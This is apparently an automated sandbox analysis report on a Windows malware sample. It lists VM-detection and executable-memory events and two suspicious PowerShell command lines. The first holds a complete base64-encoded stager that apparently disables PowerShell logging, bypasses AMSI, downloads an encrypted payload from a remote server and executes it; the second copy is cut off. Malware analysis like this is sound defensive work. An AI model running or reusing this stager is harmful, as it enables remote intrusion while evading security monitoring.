Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 12, 2024, 9:41 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 162 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 1703936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029c0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73971000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73972000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fe2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02002000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b21000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b22000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0202a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02003000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02004000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0203b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02037000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01feb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02022000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02035000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02005000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0202c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02840000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02006000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0203c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02023000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02024000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02025000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02026000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02027000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02028000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02029000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a81000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a82000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a83000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a84000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a85000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a86000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a87000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a88000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a89000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a8a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a8b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a8c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a8d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a8e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a8f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a91000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a92000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a93000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:41 a.m.	process_identifier: 792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a94000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBFAHIAUwBpAG8ATgBUAGEAQgBMAGUALgBQAFMAVgBFAHIAUwBpAG8ATgAuAE0AYQBqAG8AUgAgAC0ARwBlACAAMwApAHsAJABDADYANwA9AFsAcgBFAEYAXQAuAEEAcwBTAGUATQBiAEwAWQAuAEcAZQBUAFQAWQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAVABGAEkARQBgAEwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABjADYANwApAHsAJAA2AGMANAA9ACQAYwA2ADcALgBHAGUAVABWAEEATAB1AEUAKAAkAG4AVQBMAGwAKQA7AEkAZgAoACQANgBjADQAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJAA2AEMANABbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA2AGMANABbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAFYAQQBsAD0AWwBDAE8AbABsAEUAYwB0AEkAbwBOAHMALgBHAGUAbgBFAFIASQBjAC4ARABJAEMAVABpAG8AbgBBAHIAWQBbAHMAVABSAGkATgBnACwAUwB5AFMAdABFAG0ALgBPAGIAagBlAGMAVABdAF0AOgA6AE4ARQB3ACgAKQA7ACQAdgBhAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAVgBhAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJAA2AGMANABbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJAB2AGEATAB9AEUAbABTAGUAewBbAFMAQwBSAEkAcABUAEIAbABvAGMASwBdAC4AIgBHAEUAVABGAEkARQBgAGwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBhAEwAdQBFACgAJABOAFUAbABMACwAKABOAGUAdwAtAE8AQgBqAEUAYwB0ACAAQwBvAEwATABFAEMAdABpAE8AbgBTAC4ARwBFAG4AZQBSAGkAQwAuAEgAYQBTAEgAUwBFAHQAWwBzAFQAcgBpAG4ARwBdACkAKQB9ACQAUgBFAGYAPQBbAFIARQBmAF0ALgBBAHMAUwBFAG0AQgBMAFkALgBHAEUAdABUAFkAUABFACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQAnACsAJwBVAHQAaQBsAHMAJwApADsAJABSAEUARgAuAEcARQBUAEYASQBlAGwARAAoACcAYQBtAHMAaQBJAG4AaQB0AEYAJwArACcAYQBpAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAFQAVgBBAEwAVQBFACgAJABuAHUAbABMACwAJAB0AFIAVQBFACkAOwB9ADsAWwBTAHkAUwBUAEUATQAuAE4ARQBUAC4AUwBlAFIAdgBpAEMARQBQAE8AaQBuAFQATQBBAG4AYQBHAEUAcgBdADoAOgBFAFgAcABlAGMAVAAxADAAMABDAE8ATgB0AGkATgBVAGUAPQAwADsAJABCAGEAMAA9AE4ARQB3AC0ATwBiAGoAZQBDAHQAIABTAHkAcwB0AGUAbQAuAE4ARQB0AC4AVwBFAEIAQwBMAEkAZQBOAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJABzAGUAcgA9ACQAKABbAFQARQB4AFQALgBFAE4AQwBvAEQASQBOAGcAXQA6ADoAVQBuAEkAQwBvAGQAZQAuAEcARQB0AFMAVAByAEkATgBHACgAWwBDAE8ATgB2AGUAcgB0AF0AOgA6AEYAcgBvAE0AQgBhAHMAZQA2ADQAUwBUAFIAaQBOAGcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AdwBBAHUAQQBEAEUAQQBNAFEAQQAzAEEAQwA0AEEATQBnAEEAdwBBAEQAZwBBAEwAZwBBAHgAQQBEAFEAQQBPAEEAQQA2AEEARABjAEEATwBBAEEAdwBBAEQAQQBBACcAKQApACkAOwAkAHQAPQAnAC8AbgBlAHcAcwAuAHAAaABwACcAOwAkAGIAQQAwAC4ASABlAEEARABlAFIAcwAuAEEARABEACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAQgBhADAALgBQAHIATwBYAHkAPQBbAFMAWQBTAFQARQBNAC4ATgBFAHQALgBXAEUAYgBSAEUAUQB1AGUAUwBUAF0AOgA6AEQAZQBmAGEAdQBMAHQAVwBlAEIAUAByAE8AeAB5ADsAJABiAGEAMAAuAFAAcgBvAFgAWQAuAEMAUgBlAGQARQBuAFQASQBBAGwAcwAgAD0AIABbAFMAeQBTAHQAZQBtAC4ATgBlAHQALgBDAHIAZQBEAGUAbgBUAEkAYQBsAEMAYQBDAGgARQBdADoAOgBEAGUAZgBhAFUATAB0AE4AZQBUAHcATwBSAEsAQwByAEUAZABFAG4AdABJAEEAbABTADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAGIAYQAwAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAUwBUAGUAbQAuAFQARQBYAHQALgBFAE4AQwBvAEQASQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAFQAQgBZAHQARQBzACgAJwBkADQALAAwAGcAawBAAFsAUAAqACEALwBmAHMAdABhADoAYgA3AFEAQgBoAGwAVQBEAHIANgB4AEUAXQAzAF8AJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAUgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAE8AdQBuAFQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AQgB4AG8AcgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJABiAGEAMAAuAEgAZQBhAEQARQByAHMALgBBAEQAZAAoACIAQwBvAG8AawBpAGUAIgAsACIAcQBHAFYAVABTAHkAPQBUAEoAWAB1AFgAVgBBAHUAZQBwADQAYgBuADcANABFAEwATwAzAFcAMgBUAEoAcABzAFIAZwA9ACIAKQA7ACQAZABhAHQAQQA9ACQAYgBhADAALgBEAE8AVwBOAGwAbwBBAGQARABBAFQAQQAoACQAUwBFAFIAKwAkAFQAKQA7ACQAaQBWAD0AJABEAEEAVABBAFsAMAAuAC4AMwBdADsAJABEAGEAVABBAD0AJABEAEEAVABBAFsANAAuAC4AJABEAEEAVABBAC4AbABlAG4AZwB0AEgAXQA7AC0ASgBvAEkATgBbAEMAaABBAFIAWwBdAF0AKAAmACAAJABSACAAJABkAEEAVABBACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA=

cmdline

powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBFAHIAUwBpAG8ATgBUAGEAQgBMAGUALgBQAFMAVgBFAHIAUwBpAG8ATgAuAE0AYQBqAG8AUgAgAC0ARwBlACAAMwApAHsAJABDADYANwA9AFsAcgBFAEYAXQAuAEEAcwBTAGUATQBiAEwAWQAuAEcAZQBUAFQAWQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAVABGAEkARQBgAEwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABjADYANwApAHsAJAA2AGMANAA9ACQAYwA2ADcALgBHAGUAVABWAEEATAB1AEUAKAAkAG4AVQBMAGwAKQA7AEkAZgAoACQANgBjADQAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJAA2AEMANABbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA2AGMANABbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAFYAQQBsAD0AWwBDAE8AbABsAEUAYwB0AEkAbwBOAHMALgBHAGUAbgBFAFIASQBjAC4ARABJAEMAVABpAG8AbgBBAHIAWQBbAHMAVABSAGkATgBnACwAUwB5AFMAdABFAG0ALgBPAGIAagBlAGMAVABdAF0AOgA6AE4ARQB3ACgAKQA7ACQAdgBhAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAVgBhAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJAA2AGMANABbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJAB2AGEATAB9AEUAbABTAGUAewBbAFMAQwBSAEkAcABUAEIAbABvAGMASwBdAC4AIgBHAEUAVABGAEkARQBgAGwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBhAEwAdQBFACgAJABOAFUAbABMACwAKABOAGUAdwAtAE8AQgBqAEUAYwB0ACAAQwBvAEwATABFAEMAdABpAE8AbgBTAC4ARwBFAG4AZQBSAGkAQwAuAEgAYQBTAEgAUwBFAHQAWwBzAFQAcgBpAG4ARwBdACkAKQB9ACQAUgBFAGYAPQBbAFIARQBmAF0ALgBBAHMAUwBFAG0AQgBMAFkALgBHAEUAdABUAFkAUABFA